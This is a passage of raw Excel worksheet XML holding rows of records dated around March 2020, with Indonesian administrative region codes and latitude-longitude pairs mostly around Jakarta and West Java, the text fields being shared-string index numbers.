      <c r="I1993" t="s">
        <v>882</v>
      </c>
      <c r="J1993" t="s">
        <v>2627</v>
      </c>
      <c r="L1993" t="s">
        <v>6663</v>
      </c>
      <c r="M1993">
        <v>3275050002</v>
      </c>
      <c r="N1993">
        <v>3275050</v>
      </c>
      <c r="O1993">
        <v>3275</v>
      </c>
      <c r="P1993">
        <v>32</v>
      </c>
      <c r="Q1993" t="s">
        <v>2245</v>
      </c>
      <c r="R1993" t="s">
        <v>955</v>
      </c>
      <c r="S1993" t="s">
        <v>41</v>
      </c>
      <c r="T1993" t="s">
        <v>42</v>
      </c>
      <c r="U1993" s="5">
        <v>10697136</v>
      </c>
      <c r="V1993" s="5" t="s">
        <v>16225</v>
      </c>
      <c r="W1993" s="5">
        <v>-626215</v>
      </c>
      <c r="X1993" t="s">
        <v>19980</v>
      </c>
      <c r="Y1993" t="str">
        <f t="shared" si="31"/>
        <v>-6.26215,106.97136</v>
      </c>
    </row>
    <row r="1994" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1994">
        <v>176118</v>
      </c>
      <c r="B1994" s="1">
        <v>43910</v>
      </c>
      <c r="C1994" t="s">
        <v>6476</v>
      </c>
      <c r="D1994" t="s">
        <v>22</v>
      </c>
      <c r="E1994" t="s">
        <v>23</v>
      </c>
      <c r="F1994" t="s">
        <v>6664</v>
      </c>
      <c r="G1994" t="s">
        <v>6665</v>
      </c>
      <c r="H1994" t="s">
        <v>26</v>
      </c>
      <c r="I1994" t="s">
        <v>1447</v>
      </c>
      <c r="J1994" t="s">
        <v>2627</v>
      </c>
      <c r="L1994" t="s">
        <v>6666</v>
      </c>
      <c r="M1994">
        <v>3275040007</v>
      </c>
      <c r="N1994">
        <v>3275040</v>
      </c>
      <c r="O1994">
        <v>3275</v>
      </c>
      <c r="P1994">
        <v>32</v>
      </c>
      <c r="Q1994" t="s">
        <v>99</v>
      </c>
      <c r="R1994" t="s">
        <v>100</v>
      </c>
      <c r="S1994" t="s">
        <v>41</v>
      </c>
      <c r="T1994" t="s">
        <v>42</v>
      </c>
      <c r="U1994" s="5">
        <v>10702118</v>
      </c>
      <c r="V1994" s="5" t="s">
        <v>16226</v>
      </c>
      <c r="W1994" s="5">
        <v>-623449</v>
      </c>
      <c r="X1994" t="s">
        <v>18268</v>
      </c>
      <c r="Y1994" t="str">
        <f t="shared" si="31"/>
        <v>-6.23449,107.02118</v>
      </c>
    </row>
    <row r="1995" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1995">
        <v>176124</v>
      </c>
      <c r="B1995" s="1">
        <v>43910</v>
      </c>
      <c r="C1995" t="s">
        <v>6476</v>
      </c>
      <c r="D1995" t="s">
        <v>2648</v>
      </c>
      <c r="E1995" t="s">
        <v>23</v>
      </c>
      <c r="G1995" t="s">
        <v>6667</v>
      </c>
      <c r="H1995" t="s">
        <v>26</v>
      </c>
      <c r="J1995" t="s">
        <v>6668</v>
      </c>
      <c r="L1995" t="s">
        <v>6669</v>
      </c>
      <c r="M1995">
        <v>3174070001</v>
      </c>
      <c r="N1995">
        <v>3174070</v>
      </c>
      <c r="O1995">
        <v>3174</v>
      </c>
      <c r="P1995">
        <v>31</v>
      </c>
      <c r="Q1995" t="s">
        <v>83</v>
      </c>
      <c r="R1995" t="s">
        <v>84</v>
      </c>
      <c r="S1995" t="s">
        <v>32</v>
      </c>
      <c r="T1995" t="s">
        <v>33</v>
      </c>
      <c r="U1995" s="5">
        <v>10672214</v>
      </c>
      <c r="V1995" s="5" t="s">
        <v>16227</v>
      </c>
      <c r="W1995" s="5">
        <v>-618330</v>
      </c>
      <c r="X1995" t="s">
        <v>19981</v>
      </c>
      <c r="Y1995" t="str">
        <f t="shared" si="31"/>
        <v>-6.18330,106.72214</v>
      </c>
    </row>
    <row r="1996" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1996">
        <v>176145</v>
      </c>
      <c r="B1996" s="1">
        <v>43910</v>
      </c>
      <c r="C1996" t="s">
        <v>6476</v>
      </c>
      <c r="D1996" t="s">
        <v>22</v>
      </c>
      <c r="E1996" t="s">
        <v>23</v>
      </c>
      <c r="F1996" t="s">
        <v>6670</v>
      </c>
      <c r="G1996" t="s">
        <v>6671</v>
      </c>
      <c r="H1996" t="s">
        <v>26</v>
      </c>
      <c r="I1996" t="s">
        <v>1971</v>
      </c>
      <c r="J1996" t="s">
        <v>2627</v>
      </c>
      <c r="L1996" t="s">
        <v>6672</v>
      </c>
      <c r="M1996">
        <v>3275040008</v>
      </c>
      <c r="N1996">
        <v>3275040</v>
      </c>
      <c r="O1996">
        <v>3275</v>
      </c>
      <c r="P1996">
        <v>32</v>
      </c>
      <c r="Q1996" t="s">
        <v>2814</v>
      </c>
      <c r="R1996" t="s">
        <v>100</v>
      </c>
      <c r="S1996" t="s">
        <v>41</v>
      </c>
      <c r="T1996" t="s">
        <v>42</v>
      </c>
      <c r="U1996" s="5">
        <v>10704034</v>
      </c>
      <c r="V1996" s="5" t="s">
        <v>16228</v>
      </c>
      <c r="W1996" s="5">
        <v>-624489</v>
      </c>
      <c r="X1996" t="s">
        <v>19982</v>
      </c>
      <c r="Y1996" t="str">
        <f t="shared" si="31"/>
        <v>-6.24489,107.04034</v>
      </c>
    </row>
    <row r="1997" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1997">
        <v>176165</v>
      </c>
      <c r="B1997" s="1">
        <v>43910</v>
      </c>
      <c r="C1997" t="s">
        <v>6481</v>
      </c>
      <c r="D1997" t="s">
        <v>2648</v>
      </c>
      <c r="E1997" t="s">
        <v>23</v>
      </c>
      <c r="G1997" t="s">
        <v>6673</v>
      </c>
      <c r="H1997" t="s">
        <v>26</v>
      </c>
      <c r="J1997" t="s">
        <v>563</v>
      </c>
      <c r="L1997" t="s">
        <v>6674</v>
      </c>
      <c r="M1997">
        <v>3174010005</v>
      </c>
      <c r="N1997">
        <v>3174010</v>
      </c>
      <c r="O1997">
        <v>3174</v>
      </c>
      <c r="P1997">
        <v>31</v>
      </c>
      <c r="Q1997" t="s">
        <v>251</v>
      </c>
      <c r="R1997" t="s">
        <v>69</v>
      </c>
      <c r="S1997" t="s">
        <v>32</v>
      </c>
      <c r="T1997" t="s">
        <v>33</v>
      </c>
      <c r="U1997" s="5">
        <v>10675605</v>
      </c>
      <c r="V1997" s="5" t="s">
        <v>16229</v>
      </c>
      <c r="W1997" s="5">
        <v>-618814</v>
      </c>
      <c r="X1997" t="s">
        <v>19668</v>
      </c>
      <c r="Y1997" t="str">
        <f t="shared" si="31"/>
        <v>-6.18814,106.75605</v>
      </c>
    </row>
    <row r="1998" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1998">
        <v>176204</v>
      </c>
      <c r="B1998" s="1">
        <v>43910</v>
      </c>
      <c r="C1998" t="s">
        <v>6481</v>
      </c>
      <c r="D1998" t="s">
        <v>22</v>
      </c>
      <c r="E1998" t="s">
        <v>23</v>
      </c>
      <c r="F1998" t="s">
        <v>6675</v>
      </c>
      <c r="G1998" t="s">
        <v>6676</v>
      </c>
      <c r="H1998" t="s">
        <v>26</v>
      </c>
      <c r="I1998" t="s">
        <v>628</v>
      </c>
      <c r="J1998" t="s">
        <v>2627</v>
      </c>
      <c r="M1998">
        <v>3204120010</v>
      </c>
      <c r="N1998">
        <v>3204120</v>
      </c>
      <c r="O1998">
        <v>3204</v>
      </c>
      <c r="P1998">
        <v>32</v>
      </c>
      <c r="Q1998" t="s">
        <v>6677</v>
      </c>
      <c r="R1998" t="s">
        <v>6678</v>
      </c>
      <c r="S1998" t="s">
        <v>1464</v>
      </c>
      <c r="T1998" t="s">
        <v>42</v>
      </c>
      <c r="U1998" s="5">
        <v>10776302</v>
      </c>
      <c r="V1998" s="5" t="s">
        <v>16230</v>
      </c>
      <c r="W1998" s="5">
        <v>-705333</v>
      </c>
      <c r="X1998" t="s">
        <v>19983</v>
      </c>
      <c r="Y1998" t="str">
        <f t="shared" si="31"/>
        <v>-7.05333,107.76302</v>
      </c>
    </row>
    <row r="1999" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1999">
        <v>177236</v>
      </c>
      <c r="B1999" s="1">
        <v>43911</v>
      </c>
      <c r="C1999" t="s">
        <v>6679</v>
      </c>
      <c r="D1999" t="s">
        <v>2648</v>
      </c>
      <c r="E1999" t="s">
        <v>23</v>
      </c>
      <c r="G1999" t="s">
        <v>6680</v>
      </c>
      <c r="H1999" t="s">
        <v>26</v>
      </c>
      <c r="J1999" t="s">
        <v>6681</v>
      </c>
      <c r="L1999" t="s">
        <v>6682</v>
      </c>
      <c r="M1999">
        <v>3171090001</v>
      </c>
      <c r="N1999">
        <v>3171090</v>
      </c>
      <c r="O1999">
        <v>3171</v>
      </c>
      <c r="P1999">
        <v>31</v>
      </c>
      <c r="Q1999" t="s">
        <v>6003</v>
      </c>
      <c r="R1999" t="s">
        <v>347</v>
      </c>
      <c r="S1999" t="s">
        <v>108</v>
      </c>
      <c r="T1999" t="s">
        <v>33</v>
      </c>
      <c r="U1999" s="5">
        <v>10683717</v>
      </c>
      <c r="V1999" s="5" t="s">
        <v>16231</v>
      </c>
      <c r="W1999" s="5">
        <v>-623299</v>
      </c>
      <c r="X1999" t="s">
        <v>19984</v>
      </c>
      <c r="Y1999" t="str">
        <f t="shared" si="31"/>
        <v>-6.23299,106.83717</v>
      </c>
    </row>
    <row r="2000" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2000">
        <v>177344</v>
      </c>
      <c r="B2000" s="1">
        <v>43911</v>
      </c>
      <c r="C2000" t="s">
        <v>6488</v>
      </c>
      <c r="D2000" t="s">
        <v>2648</v>
      </c>
      <c r="E2000" t="s">
        <v>23</v>
      </c>
      <c r="G2000" t="s">
        <v>6683</v>
      </c>
      <c r="H2000" t="s">
        <v>26</v>
      </c>
      <c r="J2000" t="s">
        <v>2860</v>
      </c>
      <c r="L2000" t="s">
        <v>6684</v>
      </c>
      <c r="M2000">
        <v>3174080001</v>
      </c>
      <c r="N2000">
        <v>3174080</v>
      </c>
      <c r="O2000">
        <v>3174</v>
      </c>
      <c r="P2000">
        <v>31</v>
      </c>
      <c r="Q2000" t="s">
        <v>694</v>
      </c>
      <c r="R2000" t="s">
        <v>695</v>
      </c>
      <c r="S2000" t="s">
        <v>32</v>
      </c>
      <c r="T2000" t="s">
        <v>33</v>
      </c>
      <c r="U2000" s="5">
        <v>10669861</v>
      </c>
      <c r="V2000" s="5" t="s">
        <v>16232</v>
      </c>
      <c r="W2000" s="5">
        <v>-617273</v>
      </c>
      <c r="X2000" t="s">
        <v>19985</v>
      </c>
      <c r="Y2000" t="str">
        <f t="shared" si="31"/>
        <v>-6.17273,106.69861</v>
      </c>
    </row>
    <row r="2001" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2001">
        <v>177411</v>
      </c>
      <c r="B2001" s="1">
        <v>43912</v>
      </c>
      <c r="C2001" t="s">
        <v>6442</v>
      </c>
      <c r="D2001" t="s">
        <v>2648</v>
      </c>
      <c r="E2001" t="s">
        <v>23</v>
      </c>
      <c r="G2001" t="s">
        <v>6685</v>
      </c>
      <c r="H2001" t="s">
        <v>26</v>
      </c>
      <c r="J2001" t="s">
        <v>2860</v>
      </c>
      <c r="L2001" t="s">
        <v>2794</v>
      </c>
      <c r="M2001">
        <v>3174080001</v>
      </c>
      <c r="N2001">
        <v>3174080</v>
      </c>
      <c r="O2001">
        <v>3174</v>
      </c>
      <c r="P2001">
        <v>31</v>
      </c>
      <c r="Q2001" t="s">
        <v>694</v>
      </c>
      <c r="R2001" t="s">
        <v>695</v>
      </c>
      <c r="S2001" t="s">
        <v>32</v>
      </c>
      <c r="T2001" t="s">
        <v>33</v>
      </c>
      <c r="U2001" s="5">
        <v>10669862</v>
      </c>
      <c r="V2001" s="5" t="s">
        <v>16233</v>
      </c>
      <c r="W2001" s="5">
        <v>-617296</v>
      </c>
      <c r="X2001" t="s">
        <v>19986</v>
      </c>
      <c r="Y2001" t="str">
        <f t="shared" si="31"/>
        <v>-6.17296,106.69862</v>
      </c>
    </row>
    <row r="2002" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2002">
        <v>177448</v>
      </c>
      <c r="B2002" s="1">
        <v>43912</v>
      </c>
      <c r="C2002" t="s">
        <v>6442</v>
      </c>
      <c r="D2002" t="s">
        <v>2648</v>
      </c>
      <c r="E2002" t="s">
        <v>23</v>
      </c>
      <c r="G2002" t="s">
        <v>6686</v>
      </c>
      <c r="H2002" t="s">
        <v>26</v>
      </c>
      <c r="J2002" t="s">
        <v>2860</v>
      </c>
      <c r="L2002" t="s">
        <v>6687</v>
      </c>
      <c r="M2002">
        <v>3174080001</v>
      </c>
      <c r="N2002">
        <v>3174080</v>
      </c>
      <c r="O2002">
        <v>3174</v>
      </c>
      <c r="P2002">
        <v>31</v>
      </c>
      <c r="Q2002" t="s">
        <v>694</v>
      </c>
      <c r="R2002" t="s">
        <v>695</v>
      </c>
      <c r="S2002" t="s">
        <v>32</v>
      </c>
      <c r="T2002" t="s">
        <v>33</v>
      </c>
      <c r="U2002" s="5">
        <v>10670060</v>
      </c>
      <c r="V2002" s="5" t="s">
        <v>16234</v>
      </c>
      <c r="W2002" s="5">
        <v>-616666</v>
      </c>
      <c r="X2002" t="s">
        <v>19987</v>
      </c>
      <c r="Y2002" t="str">
        <f t="shared" si="31"/>
        <v>-6.16666,106.70060</v>
      </c>
    </row>
    <row r="2003" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2003">
        <v>177481</v>
      </c>
      <c r="B2003" s="1">
        <v>43912</v>
      </c>
      <c r="C2003" t="s">
        <v>6442</v>
      </c>
      <c r="D2003" t="s">
        <v>2648</v>
      </c>
      <c r="E2003" t="s">
        <v>23</v>
      </c>
      <c r="G2003" t="s">
        <v>6688</v>
      </c>
      <c r="H2003" t="s">
        <v>26</v>
      </c>
      <c r="J2003" t="s">
        <v>6689</v>
      </c>
      <c r="L2003" t="s">
        <v>6690</v>
      </c>
      <c r="M2003">
        <v>3174010001</v>
      </c>
      <c r="N2003">
        <v>3174010</v>
      </c>
      <c r="O2003">
        <v>3174</v>
      </c>
      <c r="P2003">
        <v>31</v>
      </c>
      <c r="Q2003" t="s">
        <v>239</v>
      </c>
      <c r="R2003" t="s">
        <v>69</v>
      </c>
      <c r="S2003" t="s">
        <v>32</v>
      </c>
      <c r="T2003" t="s">
        <v>33</v>
      </c>
      <c r="U2003" s="5">
        <v>10673155</v>
      </c>
      <c r="V2003" s="5" t="s">
        <v>16235</v>
      </c>
      <c r="W2003" s="5">
        <v>-622295</v>
      </c>
      <c r="X2003" t="s">
        <v>19988</v>
      </c>
      <c r="Y2003" t="str">
        <f t="shared" si="31"/>
        <v>-6.22295,106.73155</v>
      </c>
    </row>
    <row r="2004" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2004">
        <v>177570</v>
      </c>
      <c r="B2004" s="1">
        <v>43912</v>
      </c>
      <c r="C2004" t="s">
        <v>6514</v>
      </c>
      <c r="D2004" t="s">
        <v>85</v>
      </c>
      <c r="E2004" t="s">
        <v>23</v>
      </c>
      <c r="F2004" t="s">
        <v>6691</v>
      </c>
      <c r="G2004" t="s">
        <v>6692</v>
      </c>
      <c r="H2004" t="s">
        <v>26</v>
      </c>
      <c r="J2004" t="s">
        <v>2627</v>
      </c>
      <c r="K2004" t="s">
        <v>6693</v>
      </c>
      <c r="L2004" t="s">
        <v>6694</v>
      </c>
      <c r="M2004">
        <v>3209010013</v>
      </c>
      <c r="N2004">
        <v>3209010</v>
      </c>
      <c r="O2004">
        <v>3209</v>
      </c>
      <c r="P2004">
        <v>32</v>
      </c>
      <c r="Q2004" t="s">
        <v>6695</v>
      </c>
      <c r="R2004" t="s">
        <v>6696</v>
      </c>
      <c r="S2004" t="s">
        <v>6532</v>
      </c>
      <c r="T2004" t="s">
        <v>42</v>
      </c>
      <c r="U2004" s="5">
        <v>10868158</v>
      </c>
      <c r="V2004" s="5" t="s">
        <v>16236</v>
      </c>
      <c r="W2004" s="5">
        <v>-692228</v>
      </c>
      <c r="X2004" t="s">
        <v>19989</v>
      </c>
      <c r="Y2004" t="str">
        <f t="shared" si="31"/>
        <v>-6.92228,108.68158</v>
      </c>
    </row>
    <row r="2005" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2005">
        <v>177576</v>
      </c>
      <c r="B2005" s="1">
        <v>43912</v>
      </c>
      <c r="C2005" t="s">
        <v>6514</v>
      </c>
      <c r="D2005" t="s">
        <v>22</v>
      </c>
      <c r="E2005" t="s">
        <v>23</v>
      </c>
      <c r="F2005" t="s">
        <v>6697</v>
      </c>
      <c r="G2005" t="s">
        <v>6698</v>
      </c>
      <c r="H2005" t="s">
        <v>26</v>
      </c>
      <c r="I2005" t="s">
        <v>166</v>
      </c>
      <c r="J2005" t="s">
        <v>232</v>
      </c>
      <c r="L2005" t="s">
        <v>6699</v>
      </c>
      <c r="M2005">
        <v>3174070001</v>
      </c>
      <c r="N2005">
        <v>3174070</v>
      </c>
      <c r="O2005">
        <v>3174</v>
      </c>
      <c r="P2005">
        <v>31</v>
      </c>
      <c r="Q2005" t="s">
        <v>83</v>
      </c>
      <c r="R2005" t="s">
        <v>84</v>
      </c>
      <c r="S2005" t="s">
        <v>32</v>
      </c>
      <c r="T2005" t="s">
        <v>33</v>
      </c>
      <c r="U2005" s="5">
        <v>10672089</v>
      </c>
      <c r="V2005" s="5" t="s">
        <v>16237</v>
      </c>
      <c r="W2005" s="5">
        <v>-615980</v>
      </c>
      <c r="X2005" t="s">
        <v>19990</v>
      </c>
      <c r="Y2005" t="str">
        <f t="shared" si="31"/>
        <v>-6.15980,106.72089</v>
      </c>
    </row>
    <row r="2006" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2006">
        <v>177592</v>
      </c>
      <c r="B2006" s="1">
        <v>43912</v>
      </c>
      <c r="C2006" t="s">
        <v>6514</v>
      </c>
      <c r="D2006" t="s">
        <v>2648</v>
      </c>
      <c r="E2006" t="s">
        <v>23</v>
      </c>
      <c r="G2006" t="s">
        <v>6700</v>
      </c>
      <c r="H2006" t="s">
        <v>26</v>
      </c>
      <c r="J2006" t="s">
        <v>2860</v>
      </c>
      <c r="L2006" t="s">
        <v>6701</v>
      </c>
      <c r="M2006">
        <v>3174080001</v>
      </c>
      <c r="N2006">
        <v>3174080</v>
      </c>
      <c r="O2006">
        <v>3174</v>
      </c>
      <c r="P2006">
        <v>31</v>
      </c>
      <c r="Q2006" t="s">
        <v>694</v>
      </c>
      <c r="R2006" t="s">
        <v>695</v>
      </c>
      <c r="S2006" t="s">
        <v>32</v>
      </c>
      <c r="T2006" t="s">
        <v>33</v>
      </c>
      <c r="U2006" s="5">
        <v>10669862</v>
      </c>
      <c r="V2006" s="5" t="s">
        <v>16233</v>
      </c>
      <c r="W2006" s="5">
        <v>-617274</v>
      </c>
      <c r="X2006" t="s">
        <v>19991</v>
      </c>
      <c r="Y2006" t="str">
        <f t="shared" si="31"/>
        <v>-6.17274,106.69862</v>
      </c>
    </row>
    <row r="2007" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2007">
        <v>177778</v>
      </c>
      <c r="B2007" s="1">
        <v>43912</v>
      </c>
      <c r="C2007" t="s">
        <v>6449</v>
      </c>
      <c r="D2007" t="s">
        <v>2648</v>
      </c>
      <c r="E2007" t="s">
        <v>23</v>
      </c>
      <c r="G2007" t="s">
        <v>6702</v>
      </c>
      <c r="H2007" t="s">
        <v>26</v>
      </c>
      <c r="J2007" t="s">
        <v>2661</v>
      </c>
      <c r="L2007" t="s">
        <v>2716</v>
      </c>
      <c r="M2007">
        <v>3174080005</v>
      </c>
      <c r="N2007">
        <v>3174080</v>
      </c>
      <c r="O2007">
        <v>3174</v>
      </c>
      <c r="P2007">
        <v>31</v>
      </c>
      <c r="Q2007" t="s">
        <v>2663</v>
      </c>
      <c r="R2007" t="s">
        <v>695</v>
      </c>
      <c r="S2007" t="s">
        <v>32</v>
      </c>
      <c r="T2007" t="s">
        <v>33</v>
      </c>
      <c r="U2007" s="5">
        <v>10670989</v>
      </c>
      <c r="V2007" s="5" t="s">
        <v>16238</v>
      </c>
      <c r="W2007" s="5">
        <v>-610249</v>
      </c>
      <c r="X2007" t="s">
        <v>19992</v>
      </c>
      <c r="Y2007" t="str">
        <f t="shared" si="31"/>
        <v>-6.10249,106.70989</v>
      </c>
    </row>
    <row r="2008" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2008">
        <v>178381</v>
      </c>
      <c r="B2008" s="1">
        <v>43912</v>
      </c>
      <c r="C2008" t="s">
        <v>6454</v>
      </c>
      <c r="D2008" t="s">
        <v>22</v>
      </c>
      <c r="E2008" t="s">
        <v>23</v>
      </c>
      <c r="F2008" t="s">
        <v>6703</v>
      </c>
      <c r="G2008" t="s">
        <v>6704</v>
      </c>
      <c r="H2008" t="s">
        <v>26</v>
      </c>
      <c r="I2008" t="s">
        <v>117</v>
      </c>
      <c r="J2008" t="s">
        <v>3135</v>
      </c>
      <c r="L2008" t="s">
        <v>250</v>
      </c>
      <c r="M2008">
        <v>3671042004</v>
      </c>
      <c r="N2008">
        <v>3671042</v>
      </c>
      <c r="O2008">
        <v>3671</v>
      </c>
      <c r="P2008">
        <v>36</v>
      </c>
      <c r="Q2008" t="s">
        <v>2102</v>
      </c>
      <c r="R2008" t="s">
        <v>2102</v>
      </c>
      <c r="S2008" t="s">
        <v>201</v>
      </c>
      <c r="T2008" t="s">
        <v>171</v>
      </c>
      <c r="U2008" s="5">
        <v>10659344</v>
      </c>
      <c r="V2008" s="5" t="s">
        <v>16239</v>
      </c>
      <c r="W2008" s="5">
        <v>-616515</v>
      </c>
      <c r="X2008" t="s">
        <v>19993</v>
      </c>
      <c r="Y2008" t="str">
        <f t="shared" si="31"/>
        <v>-6.16515,106.59344</v>
      </c>
    </row>
    <row r="2009" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2009">
        <v>179702</v>
      </c>
      <c r="B2009" s="1">
        <v>43913</v>
      </c>
      <c r="C2009" t="s">
        <v>6527</v>
      </c>
      <c r="D2009" t="s">
        <v>22</v>
      </c>
      <c r="E2009" t="s">
        <v>23</v>
      </c>
      <c r="F2009" t="s">
        <v>6705</v>
      </c>
      <c r="G2009" t="s">
        <v>6706</v>
      </c>
      <c r="H2009" t="s">
        <v>26</v>
      </c>
      <c r="I2009" t="s">
        <v>511</v>
      </c>
      <c r="J2009" t="s">
        <v>6707</v>
      </c>
      <c r="L2009" t="s">
        <v>250</v>
      </c>
      <c r="M2009">
        <v>5205050010</v>
      </c>
      <c r="N2009">
        <v>5205050</v>
      </c>
      <c r="O2009">
        <v>5205</v>
      </c>
      <c r="P2009">
        <v>52</v>
      </c>
      <c r="Q2009" t="s">
        <v>6708</v>
      </c>
      <c r="R2009" t="s">
        <v>6708</v>
      </c>
      <c r="S2009" t="s">
        <v>6709</v>
      </c>
      <c r="T2009" t="s">
        <v>2154</v>
      </c>
      <c r="U2009" s="5">
        <v>11825215</v>
      </c>
      <c r="V2009" s="5" t="s">
        <v>16240</v>
      </c>
      <c r="W2009" s="5">
        <v>-853698</v>
      </c>
      <c r="X2009" t="s">
        <v>19994</v>
      </c>
      <c r="Y2009" t="str">
        <f t="shared" si="31"/>
        <v>-8.53698,118.25215</v>
      </c>
    </row>
    <row r="2010" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2010">
        <v>180113</v>
      </c>
      <c r="B2010" s="1">
        <v>43914</v>
      </c>
      <c r="C2010" t="s">
        <v>6449</v>
      </c>
      <c r="D2010" t="s">
        <v>85</v>
      </c>
      <c r="E2010" t="s">
        <v>23</v>
      </c>
      <c r="F2010" t="s">
        <v>6710</v>
      </c>
      <c r="G2010" t="s">
        <v>6711</v>
      </c>
      <c r="H2010" t="s">
        <v>26</v>
      </c>
      <c r="J2010" t="s">
        <v>6712</v>
      </c>
      <c r="K2010" t="s">
        <v>6713</v>
      </c>
      <c r="L2010" t="s">
        <v>6714</v>
      </c>
      <c r="M2010">
        <v>1903030007</v>
      </c>
      <c r="N2010">
        <v>1903030</v>
      </c>
      <c r="O2010">
        <v>1903</v>
      </c>
      <c r="P2010">
        <v>19</v>
      </c>
      <c r="Q2010" t="s">
        <v>6715</v>
      </c>
      <c r="R2010" t="s">
        <v>6716</v>
      </c>
      <c r="S2010" t="s">
        <v>6717</v>
      </c>
      <c r="T2010" t="s">
        <v>6718</v>
      </c>
      <c r="U2010" s="5">
        <v>10516282</v>
      </c>
      <c r="V2010" s="5" t="s">
        <v>16241</v>
      </c>
      <c r="W2010" s="5">
        <v>-206896</v>
      </c>
      <c r="X2010" t="s">
        <v>19995</v>
      </c>
      <c r="Y2010" t="str">
        <f t="shared" si="31"/>
        <v>-2.06896,105.16282</v>
      </c>
    </row>
    <row r="2011" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2011">
        <v>180114</v>
      </c>
      <c r="B2011" s="1">
        <v>43914</v>
      </c>
      <c r="C2011" t="s">
        <v>6527</v>
      </c>
      <c r="D2011" t="s">
        <v>2648</v>
      </c>
      <c r="E2011" t="s">
        <v>23</v>
      </c>
      <c r="G2011" t="s">
        <v>6719</v>
      </c>
      <c r="H2011" t="s">
        <v>26</v>
      </c>
      <c r="J2011" t="s">
        <v>6720</v>
      </c>
      <c r="L2011" t="s">
        <v>6721</v>
      </c>
      <c r="M2011">
        <v>3173010007</v>
      </c>
      <c r="N2011">
        <v>3173010</v>
      </c>
      <c r="O2011">
        <v>3173</v>
      </c>
      <c r="P2011">
        <v>31</v>
      </c>
      <c r="Q2011" t="s">
        <v>1510</v>
      </c>
      <c r="R2011" t="s">
        <v>1481</v>
      </c>
      <c r="S2011" t="s">
        <v>62</v>
      </c>
      <c r="T2011" t="s">
        <v>33</v>
      </c>
      <c r="U2011" s="5">
        <v>10681065</v>
      </c>
      <c r="V2011" s="5" t="s">
        <v>15658</v>
      </c>
      <c r="W2011" s="5">
        <v>-618535</v>
      </c>
      <c r="X2011" t="s">
        <v>19996</v>
      </c>
      <c r="Y2011" t="str">
        <f t="shared" si="31"/>
        <v>-6.18535,106.81065</v>
      </c>
    </row>
    <row r="2012" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2012">
        <v>180117</v>
      </c>
      <c r="B2012" s="1">
        <v>43914</v>
      </c>
      <c r="C2012" t="s">
        <v>6527</v>
      </c>
      <c r="D2012" t="s">
        <v>2648</v>
      </c>
      <c r="E2012" t="s">
        <v>23</v>
      </c>
      <c r="G2012" t="s">
        <v>6722</v>
      </c>
      <c r="H2012" t="s">
        <v>26</v>
      </c>
      <c r="J2012" t="s">
        <v>6720</v>
      </c>
      <c r="L2012" t="s">
        <v>6723</v>
      </c>
      <c r="M2012">
        <v>3173010007</v>
      </c>
      <c r="N2012">
        <v>3173010</v>
      </c>
      <c r="O2012">
        <v>3173</v>
      </c>
      <c r="P2012">
        <v>31</v>
      </c>
      <c r="Q2012" t="s">
        <v>1510</v>
      </c>
      <c r="R2012" t="s">
        <v>1481</v>
      </c>
      <c r="S2012" t="s">
        <v>62</v>
      </c>
      <c r="T2012" t="s">
        <v>33</v>
      </c>
      <c r="U2012" s="5">
        <v>10681057</v>
      </c>
      <c r="V2012" s="5" t="s">
        <v>16242</v>
      </c>
      <c r="W2012" s="5">
        <v>-618515</v>
      </c>
      <c r="X2012" t="s">
        <v>19880</v>
      </c>
      <c r="Y2012" t="str">
        <f t="shared" si="31"/>
        <v>-6.18515,106.81057</v>
      </c>
    </row>
    <row r="2013" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2013">
        <v>180123</v>
      </c>
      <c r="B2013" s="1">
        <v>43914</v>
      </c>
      <c r="C2013" t="s">
        <v>6527</v>
      </c>
      <c r="D2013" t="s">
        <v>2648</v>
      </c>
      <c r="E2013" t="s">
        <v>23</v>
      </c>
      <c r="G2013" t="s">
        <v>6724</v>
      </c>
      <c r="H2013" t="s">
        <v>26</v>
      </c>
      <c r="J2013" t="s">
        <v>6725</v>
      </c>
      <c r="L2013" t="s">
        <v>6726</v>
      </c>
      <c r="M2013">
        <v>3173080001</v>
      </c>
      <c r="N2013">
        <v>3173080</v>
      </c>
      <c r="O2013">
        <v>3173</v>
      </c>
      <c r="P2013">
        <v>31</v>
      </c>
      <c r="Q2013" t="s">
        <v>156</v>
      </c>
      <c r="R2013" t="s">
        <v>157</v>
      </c>
      <c r="S2013" t="s">
        <v>62</v>
      </c>
      <c r="T2013" t="s">
        <v>33</v>
      </c>
      <c r="U2013" s="5">
        <v>10680657</v>
      </c>
      <c r="V2013" s="5" t="s">
        <v>16243</v>
      </c>
      <c r="W2013" s="5">
        <v>-617453</v>
      </c>
      <c r="X2013" t="s">
        <v>19997</v>
      </c>
      <c r="Y2013" t="str">
        <f t="shared" si="31"/>
        <v>-6.17453,106.80657</v>
      </c>
    </row>
    <row r="2014" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2014">
        <v>180152</v>
      </c>
      <c r="B2014" s="1">
        <v>43914</v>
      </c>
      <c r="C2014" t="s">
        <v>6454</v>
      </c>
      <c r="D2014" t="s">
        <v>2648</v>
      </c>
      <c r="E2014" t="s">
        <v>23</v>
      </c>
      <c r="G2014" t="s">
        <v>6727</v>
      </c>
      <c r="H2014" t="s">
        <v>26</v>
      </c>
      <c r="J2014" t="s">
        <v>2627</v>
      </c>
      <c r="L2014" t="s">
        <v>6728</v>
      </c>
      <c r="M2014">
        <v>3275060002</v>
      </c>
      <c r="N2014">
        <v>3275060</v>
      </c>
      <c r="O2014">
        <v>3275</v>
      </c>
      <c r="P2014">
        <v>32</v>
      </c>
      <c r="Q2014" t="s">
        <v>113</v>
      </c>
      <c r="R2014" t="s">
        <v>114</v>
      </c>
